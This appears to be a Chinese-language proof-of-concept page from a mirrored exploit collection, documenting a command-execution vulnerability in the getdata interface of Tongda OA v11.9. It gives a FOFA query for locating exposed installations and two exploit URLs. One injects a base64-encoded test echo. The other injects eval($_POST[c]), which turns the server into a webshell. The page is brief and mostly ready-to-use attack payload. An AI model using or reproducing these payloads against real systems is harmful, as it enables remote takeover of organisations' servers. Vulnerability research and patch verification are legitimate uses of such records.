admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/通达OA v11.9 getdata 任意命令执行漏洞.md

35 lines
756 B
Markdown
Raw Normal View History

更新漏洞库:OA产品漏洞/
2022-10-08 10:37:33 +08:00
# 通达OA v11.9 getdata 任意命令执行漏洞
## 漏洞描述
通达OA v11.9 getdata接口存在任意命令执行漏洞攻击者通过漏洞可以执行服务器任意命令控制服务器权限
## 漏洞影响
```
通达OA v11.9
```
## FOFA
```
app="通达OA网络智能办公系统"
```
## 漏洞复现
登录页面
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20221008102828374](./images/202210081028459.png)
更新漏洞库:OA产品漏洞/
2022-10-08 10:37:33 +08:00
验证POC
```
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B/*&id=19&module=Carouselimage
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20221008102844264](./images/202210081028320.png)
更新漏洞库:OA产品漏洞/
2022-10-08 10:37:33 +08:00
```
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
```
Reference in New Issue Copy Permalink